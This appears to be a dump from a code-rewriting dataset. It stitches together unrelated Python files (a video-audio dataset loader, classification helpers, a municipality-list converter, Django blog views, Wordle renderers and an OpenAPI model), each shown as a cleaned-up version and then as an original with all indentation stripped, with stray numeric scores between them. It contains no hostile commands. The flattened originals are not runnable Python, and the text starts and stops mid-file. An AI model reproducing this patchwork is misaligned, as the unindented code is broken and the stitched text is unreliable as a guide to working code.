            item['file_path_cond_specs_'] = cond_spec_path
            if self.frame_transforms is not None:
                cond_frames = self.frame_transforms(cond_frames)
                frames = self.frame_transforms(frames)
            # Conditioning frames first, then target frames.
            item['feature'] = np.stack(cond_frames + frames, axis=0) # (30 * L, 112, 112, 3)
            item['file_path_feats_'] = (frame_path, start_frame_idx)
            item['file_path_cond_feats_'] = (cond_frame_path, cond_start_frame_idx)
            item['label'] = self.video_idx2label[video_idx]
            item['target'] = self.label2target[item['label']]
            if self.spec_transforms is not None:
                item = self.spec_transforms(item)
        except Exception:
            # DataLoader workers would otherwise swallow the error; print the
            # full formatted traceback (the original printed the raw traceback
            # *object*, which is useless) before bailing out.
            import traceback
            traceback.print_exc()
            print('!!!!!!!!!!!!!!!!!!!!', video_idx, cond_video_idx)
            print('!!!!!!!!!!!!!!!!!!!!', end_frame_idx, cond_end_frame_idx)
            exit(1)
        return item

    def validate_data(self):
        """Keep only clips whose frame folder holds enough frames for L (+0.6 s
        margin) and that are not the sole remaining hit of their video; cache
        the surviving ids to a per-L json."""
        original_len = len(self.dataset)
        valid_dataset = []
        for video_idx in tqdm(self.dataset):
            video, start_idx = video_idx.split('_')
            frame_path = os.path.join(self.frame_path, video, 'frames')
            start_frame_idx = non_negative(FPS * int(start_idx)/SR)
            end_frame_idx = non_negative(start_frame_idx + FPS * (self.L + 0.6))
            if os.path.exists(os.path.join(frame_path, f'frame{end_frame_idx:0>6d}.jpg')):
                valid_dataset.append(video_idx)
            else:
                self.video2indexes[video].remove(start_idx)
        # Fixed: the original removed items from `valid_dataset` while iterating
        # it, which skips the element after each removal; filter instead.
        valid_dataset = [
            video_idx for video_idx in valid_dataset
            if len(self.video2indexes[video_idx.split('_')[0]]) != 1
        ]
        if original_len != len(valid_dataset):
            print(f'Validated dataset with enough frames: {len(valid_dataset)}')
        self.dataset = valid_dataset
        split_clip_ids_path = os.path.join(self.splits_path, f'greatesthit_{self.split}_{self.L:.2f}.json')
        if not os.path.exists(split_clip_ids_path):
            with open(split_clip_ids_path, 'w') as f:
                json.dump(valid_dataset, f)

    def make_split_files(self, ratio=[0.85, 0.1, 0.05]):
        """Split *videos* (so clips of one video never cross splits) into
        train/test/valid and write the three json files.

        Note: `ratio` is never mutated, so the mutable default is harmless.
        """
        random.seed(1337)
        print(f'The split files do not exist @ {self.splits_path}. Calculating the new ones.')
        # The downloaded videos (some went missing on YouTube and no longer available)
        available_mel_paths = set(glob(os.path.join(self.specs_dir, '*_mel.npy')))
        self.available_video_hit = [vh for vh in self.available_video_hit if self.video_idx2path[vh] in available_mel_paths]
        # Fixed: group hits per video locally — self.video2indexes is not built
        # yet when this method is called from __init__.
        video2indexes = {}
        for vh in self.available_video_hit:
            video, start_idx = vh.split('_')
            video2indexes.setdefault(video, []).append(start_idx)
        all_video = list(video2indexes.keys())
        print(f'The number of clips available after download: {len(self.available_video_hit)}')
        print(f'The number of videos available after download: {len(all_video)}')
        available_idx = list(range(len(all_video)))
        random.shuffle(available_idx)
        assert sum(ratio) == 1.
        cut_train = int(ratio[0] * len(all_video))
        cut_test = cut_train + int(ratio[1] * len(all_video))
        train_idx = available_idx[:cut_train]
        test_idx = available_idx[cut_train:cut_test]
        valid_idx = available_idx[cut_test:]
        train_video = [all_video[i] for i in train_idx]
        test_video = [all_video[i] for i in test_idx]
        valid_video = [all_video[i] for i in valid_idx]
        # Expand each video into its clip identifiers.
        train_video_hit = []
        for v in train_video:
            train_video_hit += [get_GH_data_identifier(v, hit_idx) for hit_idx in video2indexes[v]]
        test_video_hit = []
        for v in test_video:
            test_video_hit += [get_GH_data_identifier(v, hit_idx) for hit_idx in video2indexes[v]]
        valid_video_hit = []
        for v in valid_video:
            valid_video_hit += [get_GH_data_identifier(v, hit_idx) for hit_idx in video2indexes[v]]
        # mix train and valid for better validation loss
        mixed = train_video_hit + valid_video_hit
        random.shuffle(mixed)
        split = int(len(mixed) * ratio[0] / (ratio[0] + ratio[2]))
        train_video_hit = mixed[:split]
        valid_video_hit = mixed[split:]
        with open(os.path.join(self.splits_path, 'greatesthit_train.json'), 'w') as train_file,\
             open(os.path.join(self.splits_path, 'greatesthit_test.json'), 'w') as test_file,\
             open(os.path.join(self.splits_path, 'greatesthit_valid.json'), 'w') as valid_file:
            json.dump(train_video_hit, train_file)
            json.dump(test_video_hit, test_file)
            json.dump(valid_video_hit, valid_file)
        print(f'Put {len(train_idx)} clips to the train set and saved it to ./data/greatesthit_train.json')
        print(f'Put {len(test_idx)} clips to the test set and saved it to ./data/greatesthit_test.json')
        print(f'Put {len(valid_idx)} clips to the valid set and saved it to ./data/greatesthit_valid.json')
class CondGreatestHitSpecsCondOnImageTrain(CondGreatestHitSpecsCondOnImage):
    """Train split: random resized crop / horizontal flip / color-jitter frame augmentation."""
    def __init__(self, dataset_cfg):
        train_transforms = transforms.Compose([
            Resize3D(128),
            RandomResizedCrop3D(112, scale=(0.5, 1.0)),
            RandomHorizontalFlip3D(),
            ColorJitter3D(brightness=0.1, saturation=0.1),
            ToTensor3D(),
            # ImageNet normalization statistics.
            Normalize3D(mean=[0.485, 0.456, 0.406],
                        std=[0.229, 0.224, 0.225]),
        ])
        super().__init__('train', frame_transforms=train_transforms, **dataset_cfg)
class CondGreatestHitSpecsCondOnImageValidation(CondGreatestHitSpecsCondOnImage):
    """Validation split: deterministic center-crop frame preprocessing."""
    def __init__(self, dataset_cfg):
        valid_transforms = transforms.Compose([
            Resize3D(128),
            CenterCrop3D(112),
            ToTensor3D(),
            # ImageNet normalization statistics.
            Normalize3D(mean=[0.485, 0.456, 0.406],
                        std=[0.229, 0.224, 0.225]),
        ])
        super().__init__('valid', frame_transforms=valid_transforms, **dataset_cfg)
class CondGreatestHitSpecsCondOnImageTest(CondGreatestHitSpecsCondOnImage):
    """Test split: deterministic center-crop frame preprocessing."""
    def __init__(self, dataset_cfg):
        test_transforms = transforms.Compose([
            Resize3D(128),
            CenterCrop3D(112),
            ToTensor3D(),
            # ImageNet normalization statistics.
            Normalize3D(mean=[0.485, 0.456, 0.406],
                        std=[0.229, 0.224, 0.225]),
        ])
        super().__init__('test', frame_transforms=test_transforms, **dataset_cfg)
if __name__ == '__main__':
    # Smoke test: build the data module from the experiment config and print
    # the number of training clips.
    import sys
    from omegaconf import OmegaConf
    cfg = OmegaConf.load('configs/greatesthit_transformer_with_vNet_randshift_2s_outside_video.yaml')
    data = instantiate_from_config(cfg.data)
    data.prepare_data()
    data.setup()
    print(len(data.datasets['train']))
    # print(data.datasets['train'][24])
    # print(data.datasets['validation'][24])
    # print(data.datasets['test'][24])
    # print(data.datasets['train'][24]['feature'].shape)
import re
class classification:
    """A single Dewey-decimal-style classification number, e.g. '805' or '033.1'."""

    def __init__(self, id):
        self.id = id

    def is_sane(self):
        """Return True iff the id contains only digits and dots and, when it
        has no dot, is at most three digits long.

        Fixed: the original used a ``reduce``/``map`` chain — ``reduce`` is not
        a builtin on Python 3 (NameError) and it crashed on an empty id;
        ``all`` handles both.
        """
        if not all(c in '0123456789.' for c in self.id):
            return False
        if len(self.id.split('.')) == 1 and len(self.id) > 3:
            return False
        return True

    def len(self):
        """Number of digits, ignoring the decimal point."""
        return len(self.id.replace('.', ''))
class classification_range():
    """An inclusive range of classifications that differ only in the last digit."""

    def __init__(self, classification_a, classification_b):
        """Order the two endpoints.

        The endpoints must have the same digit count and share every digit
        except the last; otherwise AssertionError is raised.
        """
        if not classification_a.len() == classification_b.len():
            raise AssertionError('Classification length mismatch')
        if not classification_a.id[:-1] == classification_b.id[:-1]:
            raise AssertionError('Range ends must share all digits but last')
        elif classification_a.id[-1] <= classification_b.id[-1]:
            self.start_classification = classification_a
            self.end_classification = classification_b
        else:
            self.start_classification = classification_b
            self.end_classification = classification_a

    def iterrange(self):
        """Return the list of classification objects from start to end, inclusive."""
        # Renamed the accumulator: the original local shadowed the class name.
        members = []
        prefix = self.start_classification.id[:-1]
        first = int(self.start_classification.id[-1])
        last = int(self.end_classification.id[-1])
        for digit in range(first, last + 1):
            members.append(classification(prefix + str(digit)))
        return members

    def ids(self):
        """Return the id strings of the range as a list.

        Fixed: the original returned ``map(...)``, which on Python 3 is a
        one-shot iterator, not the list callers compare against.
        """
        return [c.id for c in self.iterrange()]
def test():
    """Self-test for classification and classification_range; prints results."""
    # expected is_sane() verdict per id
    tests = {'35291': False,
             '35299': False,
             '805': True,
             '809': True,
             '81': True,
             '89': True,
             '033.1': True,
             '033.8': True}
    testresults = list()
    # .items() works on both Python 2 and 3 (iteritems is Python-2-only);
    # the loop variable is renamed so it no longer shadows this function
    for test_id, validity in tests.items():
        t = classification(test_id)
        testresults.append(t.is_sane() == validity)
    if all(testresults):
        print('classifications passed')
    else:
        print('classifications not passed')
    trange_a, trange_b = '033.1', '033.8'
    # deliberately passed in reverse order to exercise the swap logic
    crange = classification_range(classification(trange_b), classification(trange_a))
    trange = ['033.1', '033.2', '033.3', '033.4', '033.5', '033.6', '033.7', '033.8']
    # compare against a list so the check also works on Python 3, where
    # map() would return a lazy iterator that never equals a list
    if trange == [c.id for c in crange.iterrange()]:
        print('classification_range passed')  # fixed 'classfication' typo
class classification:
#constructor is a single number or a range
def __init__(self, id):
self.id = id
#self.id = self.id.replace('O','0')
def is_sane(self):
sane = True
if not reduce(lambda a, b: a and b,
map(lambda c: c in '0123456789.', self.id)):
sane = False
elif len(self.id.split('.')) == 1 and len(self.id) > 3:
sane = False
return sane
def len(self):
return len(self.id.replace('.',''))
class classification_range():
def __init__(self, classification_a, classification_b):
if not classification_a.len() == classification_b.len():
raise AssertionError('Classification length mismatch')
if not classification_a.id[:-1] == classification_b.id[:-1]:
raise AssertionError('Range ends must share all digits but last')
elif classification_a.id[-1] <= classification_b.id[-1]:
self.start_classification = classification_a
self.end_classification = classification_b
else:
self.start_classification = classification_b
self.end_classification = classification_a
def iterrange(self):
classification_range = []
pre = self.start_classification.id[:-1]
s = int(self.start_classification.id[-1])
e = int(self.end_classification.id[-1])
for i in range(s,e+1):
classification_range.append(classification(pre+str(i)))
return classification_range
def ids(self):
return map(lambda x: x.id, self.iterrange())
def test():
tests = {'35291': False,
'35299': False,
'805': True,
'809': True,
'81': True,
'89': True,
'033.1': True,
'033.8': True}
testresults = list()
for test, validity in tests.iteritems():
t = classification(test)
testresults.append(t.is_sane() == validity)
if all(testresults):
print 'classifications passed'
else:
print 'classifications not passed'
trange_a, trange_b = '033.1', '033.8'
crange = classification_range(classification(trange_b), classification(trange_a))
trange =['033.1', '033.2', '033.3', '033.4', '033.5', '033.6', '033.7', '033.8']
if trange == map(lambda a: a.id, crange.iterrange()):
print 'classfication_range passed' | 0.372619 | 0.413892 |
import csv
import json
import xlrd
import argparse
"""
## Usage
python mic_lglist_to_json.py mic-lglist.xls -x
## Input
- 総務省トップ > 政策 > 地方行財政 > 電子自治体 > 全国地方公共団体コード
https://www.soumu.go.jp/denshijiti/code.html
- 「都道府県コード及び市区町村コード」(令和元年5月1日現在)
curl -o mic-lglist.xls https://www.soumu.go.jp/main_content/000618153.xls
```
団体コード 都道府県名 市町村名
```
## Output with -x option
const lgList = [
{id:1, text:"USA", inc:[
{text:"west", inc:[
{id:111, text:"California", inc:[
{id:1111, text:"Los Angeles", inc:[
{id:11111, text:"Hollywood"}
]},
{id:1112, text:"San Diego"}
]},
{id:112, text:"Oregon"}
]}
]},
{id:2, text:"India"},
{id:3, text:"中国"}
];
"""
def make_select2(rows):
    """Group municipality rows under their prefecture for select2.

    Each prefecture becomes {"id", "text", "inc"}, where "inc" lists the
    municipalities (each prefixed with the prefecture name).

    :param rows: iterable of xlrd rows; row[1] is the prefecture name and
        row[2] the municipality name (empty on prefecture header rows).
    :return: list of prefecture dicts in input order.
    """
    def append_inc(parent, a):
        parent.append({
            "id": a,
            "text": a
        })
    lg_data = []
    parent = None
    for row in rows:
        if parent is not None:
            if parent["id"] == row[1].value:
                # same prefecture: record the municipality
                append_inc(parent["inc"], "".join([row[1].value, row[2].value]))
                continue
            # next prefecture: flush the finished one
            lg_data.append(parent)
        # start a fresh prefecture bucket
        parent = { "id": row[1].value, "text": row[1].value, "inc": [] }
    # bug fix: the final prefecture was never flushed, so the last
    # group in the spreadsheet was silently dropped
    if parent is not None:
        lg_data.append(parent)
    return lg_data
def make_kv(rows):
    """Build {prefecture: [municipalities]} from the MIC rows.

    :param rows: iterable of xlrd rows; row[1] is the prefecture name and
        row[2] the municipality name (empty on prefecture header rows).
    :return: dict mapping each prefecture to its list of municipalities.
    """
    lg_data = {}
    cities = []
    pref = None
    for row in rows:
        if row[2].value == "":
            # prefecture header row: flush the previous prefecture first
            if len(cities) > 0:
                lg_data.update({ pref: cities })
                cities = []
            pref = row[1].value
        else:
            cities.append(row[2].value)
    # bug fix: flush the trailing prefecture only if there was any input;
    # the original unconditionally added a bogus {None: []} entry when
    # called with no rows
    if pref is not None:
        lg_data.update({ pref: cities })
    return lg_data
#
# main
#
# Parse options, read the MIC spreadsheet and print the local-government
# list either as a JS const (with -x) or as a Python-ish dict literal.
ap = argparse.ArgumentParser()
ap.add_argument("xls_file", help="XLS file taken from MIC.")
ap.add_argument("-i", action="store", dest="indent", type=int,
                help="specify the number of columns for indent. e.g. -i 4")
ap.add_argument("-s", action="store", dest="skip_lines", type=int, default=1,
                help="""specify the number of lines at the header
                in the file to skip.""")
ap.add_argument("-x", action="store_true", dest="transx",
                help="enable to make a dict for other program (e.g. select2).")
ap.add_argument("-d", action="store_true", dest="debug",
                help="enable debug mode.")
opt = ap.parse_args()
xls_wb = xlrd.open_workbook(opt.xls_file)
if opt.debug:
    print("sheets =", xls_wb.sheet_names())
xls_sheet = xls_wb.sheet_by_index(0)
rows = xls_sheet.get_rows()
# skip the header line(s); next() is the idiomatic form of __next__()
for _ in range(opt.skip_lines):
    next(rows)
# the two 'if opt.transx' checks were merged into one branch
if opt.transx:
    # emit a JS const with the select2-style nested structure
    lg_data = make_select2(rows)
    print("const lgList = ", end="")
    print(json.dumps(lg_data, indent=opt.indent, ensure_ascii=False))
    print(";")
else:
    # emit a dict literal, four municipality names per line
    print("{")
    for pref, cities in make_kv(rows).items():
        print(f" '{pref}': [ ")
        for i, k in enumerate(cities):
            if i % 4 == 0:
                print(" " * 8, end="")
            print(f"'{k}'", end="")
            if i % 4 == 3:
                print(",")            # end of a full line of four
            elif i + 1 == len(cities):
                print("")             # last entry: close the line
            else:
                print(", ", end="")
        print(" ],")
    print("}")
from django.shortcuts import render, Http404, get_object_or_404, redirect
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.http import HttpResponseRedirect
from django.views import View
from django.contrib.auth.models import User
from .forms import CommentForm
from .models import Index, Post, Comment
# Create your views here.
class Home(View):
    """Landing page: lists every Index entry."""

    def get(self, request, *args, **kwargs):
        return render(request, "home.html", {'index': Index.objects.all()})
class IndexView(View):
    """Paginated list (5 per page) of published posts belonging to one Index."""

    def get(self, request, pk, *args, **kwargs):
        index = get_object_or_404(Index, pk=pk)
        paginator = Paginator(index.post_set.filter(status='published'), 5)
        requested_page = request.GET.get('page')
        try:
            posts = paginator.page(requested_page)
        except PageNotAnInteger:
            # missing or non-numeric ?page= parameter: show the first page
            posts = paginator.page(1)
        except EmptyPage:
            # page number past the end: clamp to the last page
            posts = paginator.page(paginator.num_pages)
        return render(request, "blog/index.html", {'index': index, 'post': posts})
class PostView(View):
    """Detail page for a single published post, including its comments."""

    def get(self, request, post_id, *args, **kwargs):
        post = get_object_or_404(Post, pk=post_id, status='published')
        context = {
            'post': post,
            'comment': post.comment_set.all(),
        }
        return render(request, "blog/post_list.html", context)
def comment_new(request):
    """Render the comment form, or persist a new comment on a valid POST.

    An invalid POST falls through and re-renders the bound form so field
    errors are shown.
    """
    if request.method == 'POST':
        form = CommentForm(request.POST)
        if form.is_valid():
            # NOTE(review): commit=False followed by an immediate save() is
            # equivalent to form.save(); presumably a related field was meant
            # to be set in between -- confirm against the form definition.
            comment = form.save(commit=False)
            comment.save()
            return redirect('/')
    else:
        form = CommentForm()
    return render(request, 'blog/comment.html', {'form': form})
def post_draft(request):
    """List every post still in draft status."""
    drafts = Post.objects.filter(status='draft')
    return render(request, 'blog/post_draft.html', {'post': drafts})
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.http import HttpResponseRedirect
from django.views import View
from django.contrib.auth.models import User
from .forms import CommentForm
from .models import Index, Post, Comment
# Create your views here.
class Home(View):
def get(self, request, *args, **kwargs):
index = Index.objects.all()
context = {
'index': index,
}
return render(request, "home.html", context)
class IndexView(View):
def get(self, request, pk, *args, **kwargs):
index = get_object_or_404(Index, pk=pk)
post_list = index.post_set.filter(status='published')
paginator = Paginator(post_list, 5)
page = request.GET.get('page')
try:
post = paginator.page(page)
except PageNotAnInteger:
post = paginator.page(1)
except EmptyPage:
post = paginator.page(paginator.num_pages)
context = {
'index': index,
'post': post,
}
return render(request, "blog/index.html", context)
class PostView(View):
def get(self, request, post_id, *args, **kwargs):
post = get_object_or_404(Post, pk=post_id, status='published')
comment = post.comment_set.all()
context = {
'post': post,
'comment': comment,
}
return render(request, "blog/post_list.html", context)
def comment_new(request):
if request.method == 'POST':
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
comment.save()
return redirect('/')
else:
form = CommentForm()
context = {
'form': form,
}
return render(request, 'blog/comment.html', context)
def post_draft(request):
post = Post.objects.filter(status='draft')
context = {
'post': post,
}
return render(request, 'blog/post_draft.html', context) | 0.440951 | 0.062445 |
import os
from abc import ABC, abstractmethod
from enum import Enum
from typing import List

from xtermcolor import colorize
class Score(Enum):
    """Per-letter outcome of scoring a guess."""
    BLANK = 0
    INCORRECT = 1
    INCORRECT_POSITION = 2
    CORRECT = 3


class Renderer(ABC):
    """
    Abstract class that contains rendering logic.
    Subclass this to a concrete class definition.

    Subclasses must implement the _char_* cell painters and _render_title.
    They are declared with @abstractmethod (instead of the previous late
    'raise NotImplementedError') so an incomplete subclass fails fast at
    construction rather than at the first render call.
    """

    def __init__(self, length: int, attempts: int) -> None:
        self.title = self._render_title(length=length)
        # one row of blank cells per allowed attempt; rows are replaced
        # wholesale in update_board, so sharing the initial string is fine
        self.board = [self._char_blank() * length] * attempts
        self.guesses: List[str] = []
        self.attempt = 0

    @abstractmethod
    def _render_title(self, length: int):
        """Return the board title, centered for this renderer's cell width."""

    def _print_guesses(self):
        if self.guesses:
            print("Previous guesses:")
            for guess in self.guesses:
                print(guess)
            print("\n")

    def _clear_output(self):
        # 'cls' on Windows; ANSI full-reset escape sequence elsewhere
        os.system("cls" if os.name == "nt" else "printf '\033c'")

    @abstractmethod
    def _char_blank(self):
        """Return the cell drawn for an unused board position."""

    @abstractmethod
    def _char_incorrect(self, char: str):
        """Return the cell for a letter absent from the answer."""

    @abstractmethod
    def _char_incorrect_position(self, char: str):
        """Return the cell for a letter present but misplaced."""

    @abstractmethod
    def _char_correct(self, char: str):
        """Return the cell for a correctly placed letter."""

    def render_board(self):
        self._clear_output()
        print(self.title)
        for row in self.board:
            print(row)

    def update_board(self, guesses: List[str], scores: List[List[Score]]):
        """
        Lazily renders the latest guess and score only,
        instead of re-rendering the entire board
        Args:
            guesses (List[str]): List of all valid guesses to date
            scores (List[List[Score]]): List of List[Score], corresponding to guesses
        """
        row = ""
        self.guesses = guesses
        for char, score in zip(guesses[-1], scores[-1]):
            if score == Score.INCORRECT:
                row += self._char_incorrect(char)
            elif score == Score.INCORRECT_POSITION:
                row += self._char_incorrect_position(char)
            else:
                # CORRECT (and, by fallthrough, BLANK) render as correct
                row += self._char_correct(char)
        self.board[self.attempt] = row
        self.attempt += 1
        self.render_board()
class AsciiRenderer(Renderer):
    """
    Renderer that uses ASCII characters to show progress.
    """

    HEX_WHITE = 0xFFFFFF
    HEX_GREY = 0x3C3C3E
    HEX_YELLOW = 0xAD9E45
    HEX_GREEN = 0x688C52

    def _cell(self, text: str, background: int):
        # every cell uses a white foreground; only the background varies
        return colorize(text, rgb=self.HEX_WHITE, bg=background)

    def _char_blank(self):
        return self._cell("___", self.HEX_WHITE)

    def _char_incorrect(self, char: str):
        return self._cell(" %s " % char, self.HEX_GREY)

    def _char_incorrect_position(self, char: str):
        return self._cell(" %s " % char, self.HEX_YELLOW)

    def _char_correct(self, char: str):
        return self._cell(" %s " % char, self.HEX_GREEN)

    def _render_title(self, length: int):
        # each board cell is three characters wide
        return "pyWORDLE".center(3 * length)
class EmojiRenderer(Renderer):
    """
    Renderer that uses emoji squares to show progress.
    Overrides render_board() to also include guess history.
    """

    # one emoji glyph per score outcome
    _BLANK = "⬜"
    _ABSENT = "⬛"
    _MISPLACED = "🟨"
    _PLACED = "🟩"

    def _char_blank(self):
        return self._BLANK

    def _char_incorrect(self, char: str):
        return self._ABSENT

    def _char_incorrect_position(self, char: str):
        return self._MISPLACED

    def _char_correct(self, char: str):
        return self._PLACED

    def _render_title(self, length: int):
        # emoji cells render two columns wide
        return "pyWORDLE".center(2 * length)

    def render_board(self):
        super().render_board()
        self._print_guesses()
from abc import ABC
from enum import Enum
from typing import List
from xtermcolor import colorize
class Score(Enum):
BLANK = 0
INCORRECT = 1
INCORRECT_POSITION = 2
CORRECT = 3
class Renderer(ABC):
"""
Abstract class that contains rendering logic.
Subclass this to a concrete class definition.
"""
def __init__(self, length: int, attempts: int) -> None:
self.title = self._render_title(length=length)
self.board = [self._char_blank() * length] * attempts
self.guesses: List[str] = []
self.attempt = 0
def _render_title(self, length: int):
raise NotImplementedError()
def _print_guesses(self):
if self.guesses:
print("Previous guesses:")
for guess in self.guesses:
print(guess)
print("\n")
def _clear_output(self):
os.system("cls" if os.name == "nt" else "printf '\033c'")
def _char_blank(self):
raise NotImplementedError()
def _char_incorrect(self, char: str):
raise NotImplementedError()
def _char_incorrect_position(self, char: str):
raise NotImplementedError()
def _char_correct(self, char: str):
raise NotImplementedError()
def render_board(self):
self._clear_output()
print(self.title)
for row in self.board:
print(row)
def update_board(self, guesses: List[str], scores: List[List[Score]]):
"""
Lazily renders the latest guess and score only,
instead of re-rendering the entire board
Args:
guesses (List[str]): List of all valid guesses to date
scores (List[List[Score]]): List of List[Score], corresponding to guesses
"""
row = ""
self.guesses = guesses
for char, score in zip(guesses[-1], scores[-1]):
if score == Score.INCORRECT:
row += self._char_incorrect(char)
elif score == Score.INCORRECT_POSITION:
row += self._char_incorrect_position(char)
else:
row += self._char_correct(char)
self.board[self.attempt] = row
self.attempt += 1
self.render_board()
class AsciiRenderer(Renderer):
"""
Renderer that uses ASCII characters to show progress.
"""
HEX_WHITE = 0xFFFFFF
HEX_GREY = 0x3C3C3E
HEX_YELLOW = 0xAD9E45
HEX_GREEN = 0x688C52
def _char_blank(self):
return colorize("___", rgb=self.HEX_WHITE, bg=self.HEX_WHITE)
def _char_incorrect(self, char: str):
return colorize(f" {char} ", rgb=self.HEX_WHITE, bg=self.HEX_GREY)
def _char_incorrect_position(self, char: str):
return colorize(f" {char} ", rgb=self.HEX_WHITE, bg=self.HEX_YELLOW)
def _char_correct(self, char: str):
return colorize(f" {char} ", rgb=self.HEX_WHITE, bg=self.HEX_GREEN)
def _render_title(self, length: int):
return "pyWORDLE".center(length * 3)
class EmojiRenderer(Renderer):
"""
Renderer that uses emoji squares to show progress.
Overrides render_board() to also include guess history.
"""
def _char_blank(self):
return "⬜"
def _char_incorrect(self, char: str):
return "⬛"
def _char_incorrect_position(self, char: str):
return "🟨"
def _char_correct(self, char: str):
return "🟩"
def _render_title(self, length: int):
return "pyWORDLE".center(length * 2)
def render_board(self):
super().render_board()
self._print_guesses() | 0.775435 | 0.290981 |
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server import util
class UserCreateRequest(Model):
    """NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
    Do not edit the class manually.
    """
    def __init__(self, login=None, email=None, password=None, name=None, avatar_url=None, bio=None): # noqa: E501
        """UserCreateRequest - a model defined in OpenAPI
        :param login: The login of this UserCreateRequest. # noqa: E501
        :type login: str
        :param email: The email of this UserCreateRequest. # noqa: E501
        :type email: str
        :param password: The password of this UserCreateRequest. # noqa: E501
        :type password: str
        :param name: The name of this UserCreateRequest. # noqa: E501
        :type name: str
        :param avatar_url: The avatar_url of this UserCreateRequest. # noqa: E501
        :type avatar_url: str
        :param bio: The bio of this UserCreateRequest. # noqa: E501
        :type bio: str
        """
        # attribute name -> declared type (consumed by util.deserialize_model)
        self.openapi_types = {
            'login': str,
            'email': str,
            'password': str,
            'name': str,
            'avatar_url': str,
            'bio': str
        }
        # attribute name -> JSON key in the wire format
        self.attribute_map = {
            'login': 'login',
            'email': 'email',
            'password': 'password',
            'name': 'name',
            'avatar_url': 'avatarUrl',
            'bio': 'bio'
        }
        # NOTE(review): values are assigned to the private attributes
        # directly, so the setters' not-None validation does not run at
        # construction time -- presumably intentional generator behaviour;
        # confirm if construction-time validation is expected.
        self._login = login
        self._email = email
        self._password = password
        self._name = name
        self._avatar_url = avatar_url
        self._bio = bio
    @classmethod
    def from_dict(cls, dikt) -> 'UserCreateRequest':
        """Returns the dict as a model
        :param dikt: A dict.
        :type: dict
        :return: The UserCreateRequest of this UserCreateRequest. # noqa: E501
        :rtype: UserCreateRequest
        """
        return util.deserialize_model(dikt, cls)
    @property
    def login(self):
        """Gets the login of this UserCreateRequest.
        :return: The login of this UserCreateRequest.
        :rtype: str
        """
        return self._login
    @login.setter
    def login(self, login):
        """Sets the login of this UserCreateRequest.
        :param login: The login of this UserCreateRequest.
        :type login: str
        """
        # login is a required field in the OpenAPI spec
        if login is None:
            raise ValueError("Invalid value for `login`, must not be `None`") # noqa: E501
        self._login = login
    @property
    def email(self):
        """Gets the email of this UserCreateRequest.
        An email address # noqa: E501
        :return: The email of this UserCreateRequest.
        :rtype: str
        """
        return self._email
    @email.setter
    def email(self, email):
        """Sets the email of this UserCreateRequest.
        An email address # noqa: E501
        :param email: The email of this UserCreateRequest.
        :type email: str
        """
        # email is a required field in the OpenAPI spec
        if email is None:
            raise ValueError("Invalid value for `email`, must not be `None`") # noqa: E501
        self._email = email
    @property
    def password(self):
        """Gets the password of this UserCreateRequest.
        :return: The password of this UserCreateRequest.
        :rtype: str
        """
        return self._password
    @password.setter
    def password(self, password):
        """Sets the password of this UserCreateRequest.
        :param password: The password of this UserCreateRequest.
        :type password: str
        """
        # password is a required field in the OpenAPI spec
        if password is None:
            raise ValueError("Invalid value for `password`, must not be `None`") # noqa: E501
        self._password = password
    @property
    def name(self):
        """Gets the name of this UserCreateRequest.
        :return: The name of this UserCreateRequest.
        :rtype: str
        """
        return self._name
    @name.setter
    def name(self, name):
        """Sets the name of this UserCreateRequest.
        :param name: The name of this UserCreateRequest.
        :type name: str
        """
        self._name = name
    @property
    def avatar_url(self):
        """Gets the avatar_url of this UserCreateRequest.
        :return: The avatar_url of this UserCreateRequest.
        :rtype: str
        """
        return self._avatar_url
    @avatar_url.setter
    def avatar_url(self, avatar_url):
        """Sets the avatar_url of this UserCreateRequest.
        :param avatar_url: The avatar_url of this UserCreateRequest.
        :type avatar_url: str
        """
        self._avatar_url = avatar_url
    @property
    def bio(self):
        """Gets the bio of this UserCreateRequest.
        :return: The bio of this UserCreateRequest.
        :rtype: str
        """
        return self._bio
    @bio.setter
    def bio(self, bio):
        """Sets the bio of this UserCreateRequest.
        :param bio: The bio of this UserCreateRequest.
        :type bio: str
        """
        self._bio = bio
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server import util
class UserCreateRequest(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, login=None, email=None, password=None, name=None, avatar_url=None, bio=None): # noqa: E501
"""UserCreateRequest - a model defined in OpenAPI
:param login: The login of this UserCreateRequest. # noqa: E501
:type login: str
:param email: The email of this UserCreateRequest. # noqa: E501
:type email: str
:param password: The password of this UserCreateRequest. # noqa: E501
:type password: str
:param name: The name of this UserCreateRequest. # noqa: E501
:type name: str
:param avatar_url: The avatar_url of this UserCreateRequest. # noqa: E501
:type avatar_url: str
:param bio: The bio of this UserCreateRequest. # noqa: E501
:type bio: str
"""
self.openapi_types = {
'login': str,
'email': str,
'password': str,
'name': str,
'avatar_url': str,
'bio': str
}
self.attribute_map = {
'login': 'login',
'email': 'email',
'password': 'password',
'name': 'name',
'avatar_url': 'avatarUrl',
'bio': 'bio'
}
self._login = login
self._email = email
self._password = password
self._name = name
self._avatar_url = avatar_url
self._bio = bio
@classmethod
def from_dict(cls, dikt) -> 'UserCreateRequest':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The UserCreateRequest of this UserCreateRequest. # noqa: E501
:rtype: UserCreateRequest
"""
return util.deserialize_model(dikt, cls)
@property
def login(self):
"""Gets the login of this UserCreateRequest.
:return: The login of this UserCreateRequest.
:rtype: str
"""
return self._login
@login.setter
def login(self, login):
"""Sets the login of this UserCreateRequest.
:param login: The login of this UserCreateRequest.
:type login: str
"""
if login is None:
raise ValueError("Invalid value for `login`, must not be `None`") # noqa: E501
self._login = login
@property
def email(self):
"""Gets the email of this UserCreateRequest.
An email address # noqa: E501
:return: The email of this UserCreateRequest.
:rtype: str
"""
return self._email
@email.setter
def email(self, email):
"""Sets the email of this UserCreateRequest.
An email address # noqa: E501
:param email: The email of this UserCreateRequest.
:type email: str
"""
if email is None:
raise ValueError("Invalid value for `email`, must not be `None`") # noqa: E501
self._email = email
@property
def password(self):
"""Gets the password of this UserCreateRequest.
:return: The password of this UserCreateRequest.
:rtype: str
"""
return self._password
@password.setter
def password(self, password):
"""Sets the password of this UserCreateRequest.
